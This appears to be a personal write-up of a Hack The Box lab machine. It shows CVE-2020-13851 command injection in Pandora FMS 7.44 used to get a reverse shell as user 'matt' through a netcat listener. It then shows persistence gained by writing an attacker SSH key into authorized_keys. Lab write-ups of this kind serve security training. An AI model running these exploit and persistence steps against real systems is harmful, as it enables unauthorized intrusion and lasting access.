CVE-2020-13851

a vulnerability was found in artica pandora fms 7.44. It has been rated as critical. This issue affects some unknown processing of the component Event Handler. The manipulation with an unknown input leads to a injection vulnerability. Using CWE to declare the problem leads to CWE-74. The software constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component. Impacted is confidentiality, integrity, and availability.

Exploit

I found an exploit online

Exploitation

┌──(kali㉿kali)-[~/…/htb/labs/pandora/pandorafms]
└─$ python3 cve-2020-13851.py -t http://localhost:8008 -c nh2mou87br8ntaitmofvnur5db -lhost 10.10.14.2 -lport 8888
Pandora FMS 7.44 CVE-2020-13851
No credentials provided. Using PHP Session cookie.
sending payload:

launching the exploit. the -c flag supplies the session cookie retrieved from exploiting [[pandora_cve-2021-32099#cve-2021-32099|CVE-2021-32099]]

┌──(kali㉿kali)-[~/…/htb/labs/pandora/pandorafms]
└─$ nnc 8888
listening on [any] 8888 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.136] 33538
bash: cannot set terminal process group (50309): Inappropriate ioctl for device
bash: no job control in this shell
matt@pandora:/var/www/pandora/pandora_console$ whoami
whoami
matt
matt@pandora:/var/www/pandora/pandora_console$ hostname
hostname
pandora
matt@pandora:/var/www/pandora/pandora_console$ ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.136  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:364  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:364  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:03:64  txqueuelen 1000  (Ethernet)
        RX packets 1168123  bytes 179373657 (179.3 MB)
        RX errors 0  dropped 20  overruns 0  frame 0
        TX packets 1241718  bytes 1010725876 (1.0 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 33481  bytes 8570690 (8.5 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 33481  bytes 8570690 (8.5 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lateral movement made to the matt user via exploiting [[#cve-2020-13851|CVE-2020-13851]]

SSH

matt@pandora:/var/www/pandora/pandora_console/images$ mkdir -p ~/.ssh ; echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali' > ~/.ssh/authorized_keys
 
┌──(kali㉿kali)-[~/…/htb/labs/pandora/pandorafms]
└─$ ssh matt@$IP          
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
  System information as of Thu 20 Apr 12:40:54 UTC 2023
 
  System load:           0.0
  Usage of /:            65.5% of 4.87GB
  Memory usage:          19%
  Swap usage:            0%
  Processes:             246
  Users logged in:       1
  IPv4 address for eth0: 10.10.11.136
  IPv6 address for eth0: dead:beef::250:56ff:feb9:364
 
  => /boot is using 91.8% of 219MB
 
 
0 updates can be applied immediately.
 
 
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
 
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
matt@pandora:~$ whoami
matt
matt@pandora:~$ hostname
pandora
matt@pandora:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.136  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:364  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:364  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:03:64  txqueuelen 1000  (Ethernet)
        RX packets 1169668  bytes 179646506 (179.6 MB)
        RX errors 0  dropped 20  overruns 0  frame 0
        TX packets 1243304  bytes 1011761119 (1.0 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 36802  bytes 9708938 (9.7 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 36802  bytes 9708938 (9.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

InfoSec LAB

Explorer

Pandora_Lateral_Movement_matt

CVE-2020-13851

Exploit

Exploitation

SSH

Interactive Graph View

Table of Contents

Backlinks